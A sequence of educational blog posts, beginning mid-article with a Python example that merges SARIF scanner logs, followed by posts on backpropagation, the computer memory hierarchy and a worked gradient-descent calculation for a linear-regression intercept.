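Because a SARIF log holds a list of runs, one simple way to combine reports is to concatenate the runs from each tool. The sketch below assumes every input is already a parsed SARIF 2.1.0 log; merge_sarif_logs and make_log are hypothetical helpers, and real aggregation platforms may also deduplicate or normalize findings.

```python
def merge_sarif_logs(logs):
    """Combine several SARIF logs into one by concatenating their runs."""
    merged = {"version": "2.1.0", "runs": []}
    for log in logs:
        merged["runs"].extend(log.get("runs", []))
    return merged


def make_log(tool_name, message):
    """Build a tiny SARIF log with one result (for demonstration only)."""
    return {
        "version": "2.1.0",
        "runs": [
            {
                "tool": {"driver": {"name": tool_name}},
                "results": [{"message": {"text": message}}],
            }
        ],
    }


combined = merge_sarif_logs([
    make_log("Semgrep", "Possible SQL Injection"),
    make_log("Gitleaks", "Hard-coded secret detected"),
])

for run in combined["runs"]:
    print(run["tool"]["driver"]["name"], len(run["results"]))
```

Each run keeps its own tool section, so the combined report still records which scanner produced which finding.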

Conclusion

SARIF is a common language that allows tools to exchange findings in a standard way.

As the number of security and code analysis tools continues to grow, standards like SARIF help reduce integration complexity and make tool ecosystems work together more effectively.


Understanding Backpropagation: How Neural Networks Learn from Their Mistakes

Ganesh Kumar — Sat, 06 Jun 2026 19:46:43 +0000

From Linear Regression to Gradient Descent

In previous parts, we discussed linear regression, gradient descent, and how to calculate the optimal slope and intercept using gradient descent.

In this article, we'll build an intuition for backpropagation, understand why it is necessary, and explore how the chain rule and gradient descent work together to enable neural network learning.

What is Backpropagation?

Backpropagation is an algorithm used to train neural networks.

It is a way to adjust the weights and biases of a neural network to reduce the error between the predicted output and the actual output.

In simple terms, it is a way for the neural network to learn from its mistakes.

Backpropagation is one of the most important concepts in machine learning. It provides a systematic way for a neural network to determine which internal parameters contributed to an error and how those parameters should be updated to reduce future mistakes.

Imagine teaching a student to solve math problems.

After each attempt, you compare the student's answer with the correct one, identify where mistakes occurred, and provide feedback. Over time, the student adjusts their approach and improves. Backpropagation works in a similar way: the network makes a prediction, calculates the error, traces that error backward through the network, and updates its parameters accordingly.

At its core, backpropagation combines two fundamental mathematical ideas:

The Chain Rule from calculus, which helps determine how changes in one part of the network affect the final error.
Gradient Descent, an optimization technique that uses those calculations to update the network's parameters in the direction that reduces error.

By repeating this cycle of predicting, measuring the error, and updating the parameters across thousands or millions of training examples, neural networks gradually learn patterns hidden within data and become increasingly accurate.


Why can't we just use one storage technology for everything?

Ganesh Kumar — Thu, 04 Jun 2026 19:41:14 +0000

Modern computers use multiple storage and memory technologies because no single medium can simultaneously provide massive capacity, ultra-low latency, high bandwidth, and low cost.

Every level of the memory hierarchy represents a tradeoff between these characteristics.

Why is there a memory hierarchy?

This is because each storage technology has its own advantages and disadvantages. We can't use one storage technology for all purposes.

The main characteristics to consider are:

Capacity
Latency
Bandwidth
Cost

Each storage technology is optimized for a specific purpose.

For example, imagine you have to travel from one place to another.
You can walk, or go by bicycle, car, train, or plane.

Each mode of transport has its own advantages and disadvantages.

Another example is choosing an LLM.

Depending on the task complexity and the size of the data, we choose a different model.

If we choose the wrong model, we will not get the desired result: either the cost will rise or the response quality will be very low.

Memory Hierarchy

The memory hierarchy is listed below, from top to bottom.

CPU Registers

This is the fastest storage available inside a processor.

Role:
Stores values currently being operated on by the CPU.

Characteristic	Value
Capacity	Extremely small (typically 32 × 64-bit registers per core)
Latency	~0.3 ns (about one CPU cycle)
Bandwidth	Highest in the system
Cost	Highest cost per bit (16 transistors per bit)

CPU Cache (L1, L2, L3)

A small, ultra-fast memory layer designed to keep frequently used data close to the processor.

Role: Reduces the need to access slower main memory.

Characteristic	Value
Capacity	Small (tens of MB total)
Latency	~7.5 ns (L3 cache)
Bandwidth	Extremely high
Cost	Very expensive (SRAM, 6 transistors per bit)

DRAM (Main Memory)

The working memory used by applications and operating systems.

Role: Holds active programs and data currently being used.

Characteristic	Value
Capacity	Typically 32 GB
Latency	~45 ns
Bandwidth	~48 GB/s
Cost	Higher than storage drives

GPU VRAM

Memory optimized for throughput rather than low latency.
Role: Feeds large amounts of data to thousands of GPU cores simultaneously.

Characteristic	Value
Capacity	~24 GB
Latency	~250 ns
Bandwidth	Extremely high
Cost	Expensive

NVMe SSD

High-speed solid-state storage connected through PCIe.
Role: Fast persistent storage for operating systems, applications, and files.

Characteristic	Value
Capacity	~2 TB
Read Latency	~80 μs
Write Latency	~500 μs
Bandwidth	~5 GB/s
Cost	~7 cents per GB

SATA SSD

An older solid-state storage technology using the SATA interface.

Role: Affordable solid-state storage with lower performance than NVMe.

Characteristic	Value
Capacity	Up to ~4 TB
Latency	~120 μs
Bandwidth	Lower than NVMe
Cost	Similar to NVMe SSDs

Hard Disk Drive (HDD)

Mechanical storage using spinning magnetic platters.
Role: Lowest-cost local storage for large datasets and archives.

Characteristic	Value
Capacity	~8 TB
Latency	~8.3–10 ms
Bandwidth	Very low compared to SSDs
Cost	~1–2 cents per GB

The Fundamental Tradeoff

As we move down the memory hierarchy:

Capacity increases.
Cost per GB decreases.
Latency increases.
Access speed decreases.
Distance from the processor increases.

By leveraging this trade-off, modern computers use a hierarchy of registers, cache, memory, SSDs, HDDs, and cloud storage instead of relying on a single storage technology.
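
To get a feel for the size of these gaps, the short Python sketch below compares each level with a register access. It only reuses the approximate latency figures from the tables above, converted to nanoseconds, so the ratios are rough orders of magnitude rather than measurements.

```python
# Approximate latencies from the tables above, in nanoseconds
latency_ns = {
    "CPU register": 0.3,
    "L3 cache": 7.5,
    "DRAM": 45,
    "GPU VRAM": 250,
    "NVMe SSD (read)": 80_000,  # 80 μs
    "SATA SSD": 120_000,        # 120 μs
    "HDD": 8_300_000,           # 8.3 ms
}

register = latency_ns["CPU register"]

for name, ns in latency_ns.items():
    ratio = ns / register
    print(f"{name:<16} {ns:>13,.1f} ns   ~{ratio:,.0f}x a register access")
```

With these figures, a DRAM access costs about as much as 150 register accesses, and a single HDD access costs tens of millions.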


Credits

Here are the sources that inspired me to write an article on this topic.

Why Don’t Computers Just Use One Type of Memory?

From Linear Regression to Gradient Descent

Ganesh Kumar — Thu, 04 Jun 2026 06:14:59 +0000

In the previous section, we learned that linear regression finds the best-fitting line by determining the optimal slope and intercept.

In this article, we will discuss how to calculate the optimal slope and intercept using Gradient Descent.

How to calculate the optimal slope and intercept using Gradient Descent

The quality of that line is measured using the Sum of Squared Residuals (SSR), which represents the total prediction error.

SSR = sum( (y_observed - y_predicted)^2 )

The best regression line is simply the line that produces the smallest SSR.

When studying linear regression, it's easy to think that the slope and intercept magically appear from a formula. In reality, they are the values that minimize the prediction error. This is where Gradient Descent comes in.

Instead of calculating the optimal slope and intercept directly using a closed-form equation, Gradient Descent starts with arbitrary values and gradually improves them. After each step, it measures how the SSR changes and adjusts the parameters in the direction that reduces the error.

Step-by-Step Gradient Descent Example

Let's illustrate how Gradient Descent works using the exact same dataset of 4 points from Part 10:

1. The Dataset

Point 1: (1, 2)
Point 2: (2, 3)
Point 3: (3, 5)
Point 4: (4, 4)

2. Simplifying the Problem

To make the math easy to trace, we will hold the Slope (m) constant at its optimal value of 0.8 and focus purely on finding the optimal Intercept (b).

Our prediction equation is:

y_predicted = 0.8 * x + b

We start with an initial guess for the intercept: b = 0.

3. Calculating the Initial SSR (at b = 0)

Let's find the predicted values and calculate the residuals (observed - predicted):

For Point 1 (1, 2):
- y_predicted = 0.8 * 1 + 0 = 0.8
- Residual_1 = 2 - 0.8 = 1.2
For Point 2 (2, 3):
- y_predicted = 0.8 * 2 + 0 = 1.6
- Residual_2 = 3 - 1.6 = 1.4
For Point 3 (3, 5):
- y_predicted = 0.8 * 3 + 0 = 2.4
- Residual_3 = 5 - 2.4 = 2.6
For Point 4 (4, 4):
- y_predicted = 0.8 * 4 + 0 = 3.2
- Residual_4 = 4 - 3.2 = 0.8

Now, sum the squared residuals:

SSR = 1.2^2 + 1.4^2 + 2.6^2 + 0.8^2
    = 1.44 + 1.96 + 6.76 + 0.64
    = 10.8

4. Derivation of the Gradient (d(SSR)/db)

To know which direction to move the intercept b and by how much, we take the derivative of SSR with respect to b:

SSR = sum( (y_observed - (0.8 * x_observed + b))^2 )

Applying the chain rule:

d(SSR)/db = sum( 2 * (y_observed - (0.8 * x_observed + b)) * (-1) )
          = -2 * sum( y_observed - y_predicted )
          = -2 * sum( Residuals )

The gradient is simply -2 times the sum of the residuals.

5. Updating the Intercept

The update rule is:

b_new = b_old - (Learning Rate * Gradient)

Let's choose a Learning Rate (LR) of 0.1.

Step 1:
- Gradient: d(SSR)/db = -2 * (1.2 + 1.4 + 2.6 + 0.8) = -2 * 6.0 = -12.0
- Step Size: Gradient * LR = -12.0 * 0.1 = -1.2
- New Intercept: b_new = 0 - (-1.2) = 1.2
Step 2:
- With b = 1.2, the predictions are closer to the actual values.
- The new residuals are: 0.0, 0.2, 1.4, and -0.4.
- SSR: 0.0^2 + 0.2^2 + 1.4^2 + (-0.4)^2 = 2.16
- Gradient: -2 * (0.0 + 0.2 + 1.4 - 0.4) = -2.4
- Step Size: -2.4 * 0.1 = -0.24
- New Intercept: b_new = 1.2 - (-0.24) = 1.44
Step 3 (Convergence):
- With b = 1.44, the new residuals are: -0.24, -0.04, 1.16, and -0.64.
- Gradient: -2 * (-0.24 - 0.04 + 1.16 - 0.64) = -0.48
- Step Size: -0.48 * 0.1 = -0.048
- New Intercept: b_new = 1.44 - (-0.048) = 1.488
- We repeat this loop. As we approach the optimal intercept, the sum of the residuals gets closer to 0, which shrinks the gradient and the step size.
- After several iterations, the gradient approaches 0, and the intercept converges to the optimal value of 1.5 (where SSR reaches its minimum value of 1.8).
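
The whole procedure fits in a short Python loop. This is a minimal sketch that reuses the dataset, the fixed slope of 0.8, and the learning rate of 0.1 from this example; the number of iterations (50) is an arbitrary choice that is more than enough for this problem.

```python
points = [(1, 2), (2, 3), (3, 5), (4, 4)]
slope = 0.8          # held constant at its optimal value
learning_rate = 0.1


def gradient(b):
    """d(SSR)/db = -2 * sum of residuals."""
    return -2 * sum(y - (slope * x + b) for x, y in points)


def ssr(b):
    return sum((y - (slope * x + b)) ** 2 for x, y in points)


b = 0.0              # initial guess for the intercept
history = []
for _ in range(50):
    b = b - learning_rate * gradient(b)
    history.append(b)

print([round(v, 3) for v in history[:3]])  # [1.2, 1.44, 1.488]
print(round(b, 4), round(ssr(b), 4))       # 1.5 1.8
```

The first three values match Steps 1 to 3 above, and the loop settles at the intercept of 1.5 with an SSR of 1.8.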

Conclusion

We started with an arbitrary intercept of 0 and adjusted it step-by-step. Each step was guided by the gradient, which told us exactly how much to change the intercept to reduce the prediction error (SSR). We repeated this process until the error reached its minimum.

While this example focused on a simple linear regression with a single variable, this same principle applies to deep neural networks with millions of parameters. Gradient descent is the engine that drives learning in machine learning.
